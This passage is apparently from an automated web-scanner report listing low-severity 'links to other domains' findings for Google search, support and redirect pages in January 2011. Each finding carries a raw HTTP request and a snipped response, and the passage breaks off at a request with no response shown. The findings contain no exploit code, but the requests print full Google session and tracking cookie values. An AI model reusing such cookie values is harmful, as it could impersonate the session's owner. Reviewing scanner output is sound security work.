  • http://biotech.icmb.utexas.edu/botany/cite.html
  • http://stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html
  • http://webcache.googleusercontent.com/search?q=cache:HfncsywxE84J:www.ableize.com/society-and-culture/Blogs-Disability-Related/+related:www.a&cd=8&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:Iqwuc7RdBrgJ:www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm+related:www.a&cd=3&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:QdBzjL3__icJ:www.facebook.com/myrelatives+related:www.a&cd=9&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:Qdu9zt6w-LQJ:www.musc.edu/tmsmirror/WWWpages.html+related:www.a&cd=1&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:W1frUZz64QsJ:www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm+related:www.a&cd=4&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:iesY4Xatv3cJ:stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html+related:www.a&cd=5&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:isMHz8jsKq8J:www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML+related:www.a&cd=2&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:jfZwnLY0cfUJ:zibzoom.com/search%3Fpage%3D6%26limit%3D10%26engine%3Dgoogle_web%26query%3Drelated%253Awww.paglamusic.com%252F...%252Fvideo.php%253F...videos%25252FaIu6kdWMhGc%25252Frelated+related:www.a&cd=10&hl=en&ct=clnk&gl=us
  • http://webcache.googleusercontent.com/search?q=cache:osy5Soj_xa8J:biotech.icmb.utexas.edu/botany/cite.html+related:www.a&cd=7&hl=en&ct=clnk&gl=us
  • http://www.ableize.com/society-and-culture/Blogs-Disability-Related/
  • http://www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm
  • http://www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm
  • http://www.awma.org/about/related_orgs.html
  • http://www.examiner.com/african-american-entertainment-in-national/is-oprah-winfrey-s-secret-related-to-her-father-vernon
  • http://www.facebook.com/myrelatives
  • http://www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML
  • http://www.klfy.com/Global/story.asp?S=13894048
  • http://www.musc.edu/tmsmirror/WWWpages.html
  • http://www.reuters.com/article/idUSTRE70N0XR20110124
  • http://www.youtube.com/results?hl=en&q=related:www.a&um=1&ie=UTF-8&sa=N&tab=w1
  • http://zibzoom.com/search?page=6&limit=10&engine=google_web&query=related%3Awww.paglamusic.com%2F...%2Fvideo.php%3F...videos%252FaIu6kdWMhGc%252Frelated

Request

GET /search?hl=en&q=related:www.a&tbo=1&sa=X&ei=3wT0TMMWJ_5AKtpypmg8&ved=0CGEQHzA0BEKEI HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:14 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>related:www.a - Google Search</title><script>window.google={kEI:"bqs9Ta_RHoXZgAfonYy1CA",kEXPI:"17259,17291
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=related:www.a&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.musc.edu/tmsmirror/WWWpages.html" class=l onmousedown="return clk(this.href,'','','','1','','0CCIQFjAA')">TMS-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Qdu9zt6w-LQJ:www.musc.edu/tmsmirror/WWWpages.html+related:www.a&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1','','0CCQQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML" class=l onmousedown="return clk(this.href,'','','','2','','0CCYQFjAB')">Geochemistry Web Links</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:isMHz8jsKq8J:www.geo.cornell.edu/geology/classes/Geochemweblinks.HTML+related:www.a&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm" class=l onmousedown="return clk(this.href,'','','','3','','0CCoQFjAC')">ACRL | Links-<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Iqwuc7RdBrgJ:www.ala.org/ala/mgrps/divs/acrl/issues/infolit/resources/links/index.cfm+related:www.a&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','3','','0CCwQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm" class=l onmousedown="return clk(this.href,'','','','4','','0CC0QFjAD')">ACRL | IS | Bibliography of Citations <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:W1frUZz64QsJ:www.ala.org/ala/mgrps/divs/acrl/about/sections/is/projpubs/bibcitations.cfm+related:www.a&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','4','','0CC8QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">97 General Sites (Vietnam <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iesY4Xatv3cJ:stason.org/TULARC/history/vietnam/97-General-Sites-Vietnam-Related-WWW-Resources.html+related:www.a&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','5','','0CDQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.awma.org/about/related_orgs.html" class=l onmousedown="return clk(this.href,'','','','6','','0CDUQFjAF')"><em>
...[SNIP]...
<h3 class="r"><a href="http://biotech.icmb.utexas.edu/botany/cite.html" class=l onmousedown="return clk(this.href,'','','','7','','0CDcQFjAG')">Cyberbotanica: Bibliography and <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:osy5Soj_xa8J:biotech.icmb.utexas.edu/botany/cite.html+related:www.a&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','7','','0CDkQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ableize.com/society-and-culture/Blogs-Disability-Related/" class=l onmousedown="return clk(this.href,'','','','8','','0CDsQFjAH')">Blogs - Disability <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:HfncsywxE84J:www.ableize.com/society-and-culture/Blogs-Disability-Related/+related:www.a&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','8','','0CD8QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/myrelatives" class=l onmousedown="return clk(this.href,'','','','9','','0CEEQFjAI')">We&#39;re <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:QdBzjL3__icJ:www.facebook.com/myrelatives+related:www.a&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','9','','0CEMQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://zibzoom.com/search?page=6&amp;limit=10&amp;engine=google_web&amp;query=related%3Awww.paglamusic.com%2F...%2Fvideo.php%3F...videos%252FaIu6kdWMhGc%252Frelated" class=l onmousedown="return clk('http://zibzoom.com/search?page=6&limit=10&engine=google_web&query=related%3Awww.paglamusic.com%2F...%2Fvideo.php%3F...videos%252FaIu6kdWMhGc%252Frelated','','','','10','','0CEQQFjAJ')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jfZwnLY0cfUJ:zibzoom.com/search%3Fpage%3D6%26limit%3D10%26engine%3Dgoogle_web%26query%3Drelated%253Awww.paglamusic.com%252F...%252Fvideo.php%253F...videos%25252FaIu6kdWMhGc%25252Frelated+related:www.a&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jfZwnLY0cfUJ:zibzoom.com/search%3Fpage%3D6%26limit%3D10%26engine%3Dgoogle_web%26query%3Drelated%253Awww.paglamusic.com%252F...%252Fvideo.php%253F...videos%25252FaIu6kdWMhGc%25252Frelated+related:www.a&cd=10&hl=en&ct=clnk&gl=us','','','','10','','0CEYQIDAJ')">Cached</a>
...[SNIP]...
<li class=w0 style=list-style-position:outside><a href="http://www.reuters.com/article/idUSTRE70N0XR20110124" class=l onmousedown="return clk(this.href,'','','','11','','0CEcQqQIwCg')">Clinton to focus on drug-<em>
...[SNIP]...
<div style=max-width:509px><a href="http://www.klfy.com/Global/story.asp?S=13894048" class=l onmousedown="return clk(this.href,'','','','12','','0CEsQqQIwCw')">Man pleads guilty to fraud <em>
...[SNIP]...
<div style=max-width:509px><a href="http://www.examiner.com/african-american-entertainment-in-national/is-oprah-winfrey-s-secret-related-to-her-father-vernon" class=l onmousedown="return clk(this.href,'','','','13','','0CE4QqQIwDA')">Is Oprah Winfrey&#39;s secret <em>
...[SNIP]...

20.676. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/search?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&tab=wv
The response contains the following links to other domains:
  • http://img.youtube.com/vi/BR4yQFZK9YM/default.jpg
  • http://img.youtube.com/vi/FJfFZqTlWrQ/default.jpg
  • http://img.youtube.com/vi/P-AYAv0IoWI/default.jpg
  • http://img.youtube.com/vi/eocCPDxKq1o/default.jpg
  • http://img.youtube.com/vi/nJ3ZM8FDBlg/default.jpg
  • http://vimeo.com/7743200
  • http://www.channel4.com/programmes/peep-show/4od
  • http://www.pp2g.tv/va396YnI_.aspx
  • http://www.southparkstudios.com/clips/185672
  • http://www.spike.com/video/978359
  • http://www.youtube.com/results?hl=en&q=p&um=1&ie=UTF-8&sa=N&tab=v1
  • http://www.youtube.com/watch?v=BR4yQFZK9YM
  • http://www.youtube.com/watch?v=FJfFZqTlWrQ
  • http://www.youtube.com/watch?v=P-AYAv0IoWI
  • http://www.youtube.com/watch?v=eocCPDxKq1o
  • http://www.youtube.com/watch?v=nJ3ZM8FDBlg

Request

GET /search?hl=en&q=p&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&tab=wv HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Date: Mon, 24 Jan 2011 16:40:13 GMT
Expires: -1
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>p - Google Search</title><script>window.google={kEI:"bas9TefyMISclgfpj8GrBw",kEXPI:"17259,17291,23961,27615
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=p&um=1&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v1483871646885698228" href="/url?q=http://www.youtube.com/watch%3Fv%3DFJfFZqTlWrQ&amp;sa=X&amp;ei=bas9TefyMISclgfpj8GrBw&amp;ved=0CDEQuAIwAA&amp;usg=AFQjCNFPptfPfCpn91b_gJ1pgRii4FelUA" ><img src="http://img.youtube.com/vi/FJfFZqTlWrQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=FJfFZqTlWrQ" class=l onmousedown="return clk(this.href,'','1483871646885698228','','1','','0CDAQtwIwAA')"><em>
...[SNIP]...
<a id="v368787471398008195" href="/url?q=http://www.youtube.com/watch%3Fv%3DBR4yQFZK9YM&amp;sa=X&amp;ei=bas9TefyMISclgfpj8GrBw&amp;ved=0CDUQuAIwAQ&amp;usg=AFQjCNEYQCzr7BYkiSWqpqaYDrkE8Wq9Sg" ><img src="http://img.youtube.com/vi/BR4yQFZK9YM/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=BR4yQFZK9YM" class=l onmousedown="return clk(this.href,'','368787471398008195','','2','','0CDQQtwIwAQ')"><em>
...[SNIP]...
<a id="v8829028052215966554" href="/url?q=http://www.youtube.com/watch%3Fv%3DeocCPDxKq1o&amp;sa=X&amp;ei=bas9TefyMISclgfpj8GrBw&amp;ved=0CDkQuAIwAg&amp;usg=AFQjCNFTycnYQcyu5ewJJP8a4wGhW7vYAg" ><img src="http://img.youtube.com/vi/eocCPDxKq1o/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=eocCPDxKq1o" class=l onmousedown="return clk(this.href,'','8829028052215966554','','3','','0CDgQtwIwAg')"><em>
...[SNIP]...
<a id="v4602705220286849378" href="/url?q=http://www.youtube.com/watch%3Fv%3DP-AYAv0IoWI&amp;sa=X&amp;ei=bas9TefyMISclgfpj8GrBw&amp;ved=0CD0QuAIwAw&amp;usg=AFQjCNHCF0Jrk5uOtmxdjapS2IZBJeznGg" ><img src="http://img.youtube.com/vi/P-AYAv0IoWI/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=P-AYAv0IoWI" class=l onmousedown="return clk(this.href,'','4602705220286849378','','4','','0CDwQtwIwAw')">Sweet Child O&#39; Mine Music Video</a>
...[SNIP]...
<h3 class=r><a href="http://www.pp2g.tv/va396YnI_.aspx" class=l onmousedown="return clk(this.href,'','6939374973119908691','','5','','0CEAQtwIwBA')">Pleasure <em>
...[SNIP]...
<h3 class=r><a href="http://vimeo.com/7743200" class=l onmousedown="return clk(this.href,'','11786434714553041377','','6','','0CEQQtwIwBQ')" title="The Horsemen P-51 Mustang Flying Legends Duxford 2009">The Horsemen <em>
...[SNIP]...
<h3 class=r><a href="http://www.spike.com/video/978359" class=l onmousedown="return clk(this.href,'','4121787078203026266','','7','','0CEgQtwIwBg')">A &amp; <em>
...[SNIP]...
<h3 class=r><a href="http://www.southparkstudios.com/clips/185672" class=l onmousedown="return clk(this.href,'','4198850822176723815','','8','','0CEwQtwIwBw')" title="P. Diddy&#39;s Ditty (Season 8, Episode 8) - Video Clips - ..."><em>
...[SNIP]...
<a id="v-7161329016140265896" href="/url?q=http://www.youtube.com/watch%3Fv%3DnJ3ZM8FDBlg&amp;sa=X&amp;ei=bas9TefyMISclgfpj8GrBw&amp;ved=0CFEQuAIwCA&amp;usg=AFQjCNH3t3c9CQGpBflCUxwHGvmo2rtELQ" ><img src="http://img.youtube.com/vi/nJ3ZM8FDBlg/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb9 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=nJ3ZM8FDBlg" class=l onmousedown="return clk(this.href,'','11285415057569285720','','9','','0CFAQtwIwCA')"><em>
...[SNIP]...
<h3 class=r><a href="http://www.channel4.com/programmes/peep-show/4od" class=l onmousedown="return clk(this.href,'','10209197322513766672','','10','','0CFQQtwIwCQ')">Peep Show</a>
...[SNIP]...

20.677. http://www.google.com/support/chrome/bin/answer.py

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/chrome/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/support/chrome/bin/answer.py?answer=95671&hl=en
The response contains the following links to other domains:
  • http://chrome.blogspot.com/
  • http://googlechromereleases.blogspot.com/?source=ln
  • http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&tt=%22Oops%21+This+link+appears+broken.%22
  • http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&n=%22Oops%21+This+link+appears+broken.%22
  • http://www.facebook.com/googlechrome
  • http://www.google-analytics.com/ga.js
  • http://www.whatbrowser.org/
  • http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&&enablejsapi=1&playerapiid=WhatIsBrowserDownload

Request

GET /support/chrome/bin/answer.py?answer=95671&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D1048c45e2d599fb4%26v%3D2%26c%3De93dbe18%26s%3D4d3e1337%26t%3DA%3A0%3A95671%26sessref%3D; Expires=Tue, 25-Jan-2011 00:33:04 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Tue, 25 Jan 2011 00:03:04 GMT
Expires: Tue, 25 Jan 2011 00:03:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
<li class="LeftNav_HelpCenterReleaseNotes first">
<a href="http://googlechromereleases.blogspot.com/?source=ln" onclick="track('LeftNav', 'HelpCenterReleaseNotes');">Google Chrome release notes</a>
...[SNIP]...
<li class="LeftNav_HelpCenterBlog">
<a href="http://chrome.blogspot.com" onclick="track('LeftNav', 'HelpCenterBlog');">Google Chrome blog</a>
...[SNIP]...
<li class="LeftNav_Facebook">
<a href="http://www.facebook.com/googlechrome" onclick="track('LeftNav', 'Facebook');">Chrome on Facebook</a>
...[SNIP]...
<li class="LeftNav_HelpCenterBrowser">
<a href="http://www.whatbrowser.org/" onclick="track('LeftNav', 'HelpCenterBrowser');">Whatbrowser.org</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);">
<a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&n=%22Oops%21+This+link+appears+broken.%22"
onclick="track('Page Actions',
'Share - Blogger')"
target="_blank">
Blogger</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);">
<a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fchrome%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D95671%26ctx%3Dshare&tt=%22Oops%21+This+link+appears+broken.%22"
onclick="track('Page Actions',
'Share - Orkut')"
target="_blank">
Orkut</a>
...[SNIP]...
<center>
<object type="application/x-shockwave-flash" data="http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&%26enablejsapi=1%26playerapiid=WhatIsBrowserDownload" width="280"
height="180" id="WhatIsBrowserDownload">

<param name="src" value="http://www.youtube.com/v/BrXPcaRlBqo&hl=en&fs=1&%26enablejsapi=1%26playerapiid=WhatIsBrowserDownload" />
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

20.678. http://www.google.com/support/websearch/bin/answer.py

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/websearch/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/support/websearch/bin/answer.py?answer=186645&hl=en&form=bb
The response contains the following link to another domain:
  • http://www.google-analytics.com/ga.js

Request

GET /support/websearch/bin/answer.py?answer=186645&hl=en&form=bb HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3Db05508fc5fd1fa4%26v%3D2%26c%3D59402611%26s%3D4d3dab57%26t%3DA%3A0%3A186645%26sessref%3D; Expires=Mon, 24-Jan-2011 17:09:52 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 16:39:52 GMT
Expires: Mon, 24 Jan 2011 16:39:52 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

20.679. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/url?sa=t&source=web&cd=1&ved=0CCQQFjAA&url=http%3A%2F%2Fwww.freebsd.org%2Fports%2Fnews.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNE5GHommdv46VxwbgrvFtWCAat5tA
The response contains the following link to another domain:
  • http://www.freebsd.org/ports/news.html

Request

GET /url?sa=t&source=web&cd=1&ved=0CCQQFjAA&url=http%3A%2F%2Fwww.freebsd.org%2Fports%2Fnews.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNE5GHommdv46VxwbgrvFtWCAat5tA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://www.freebsd.org/ports/news.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:33 GMT
Server: gws
Content-Length: 235
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.freebsd.org/ports/news.html">here</A>
...[SNIP]...

20.680. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/url?url=http://www.youtube.com/watch%3Fv%3D&rct=j&sa=X&ei=4AT0T
The response contains the following link to another domain:
  • http://www.youtube.com/watch?v=

Request

GET /url?url=http://www.youtube.com/watch%3Fv%3D&rct=j&sa=X&ei=4AT0T HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:40:04 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<body><a href="http://www.youtube.com/watch?v=" id=link target=_parent></body><script>var a=parent,b=parent.google,c=location;if(a!=window&&b){if(b.r){b.r=0;document.getElementById("link").click();}}e
...[SNIP]...

20.681. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNGUi3C6Dl7duUZzojASxTnivAMCAw
The response contains the following link to another domain:
  • http://linux.maruhn.com/sec/aub.html

Request

GET /url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNGUi3C6Dl7duUZzojASxTnivAMCAw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
